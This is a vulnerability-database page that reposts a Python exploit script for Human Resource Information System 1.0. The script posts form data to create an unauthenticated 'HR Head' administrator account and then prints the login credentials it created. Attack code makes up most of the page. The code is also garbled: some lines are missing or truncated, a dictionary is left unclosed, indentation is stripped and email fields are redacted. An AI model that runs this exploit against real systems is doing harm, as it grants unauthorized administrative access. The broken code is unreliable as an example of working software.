Wednesday, May 5, 2021

Human Resource Information System 1.0 Authentication Bypass / Account Creation

# Exploit Title: Human Resource Information System 1.0 - Create Admin Account (Unauthenticated)
# Exploit Author: Richard Jones
# Vendor Homepage:
# Version:1.0
# Tested on: windows 10 (build 19041) + xampp v3.2.4

import requests

BASEURL="http://localhost/HRI/" #Change Base url to target path
s = requests.Session()

print("\nHuman Resource Information System - Create Admin Account (Unauthenticated)")
print("Created On: 04/05/2021\nAuthor: Richard Jones\n")

print("[-] Checking Host")
if not r.status_code == 200:
print("[!] Host Error, Check URL...")

print("[+] Creating Admin account")
data = {
"hr_type":"HR Head",
"hr_email":"[email protected]",

r =, data=data)
if 'Insert Successfully!!!' in r.text:
print("[+] Account Created!")
print("[+] Login Credentials Created:\n [email protected]:admin4\n\n")

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated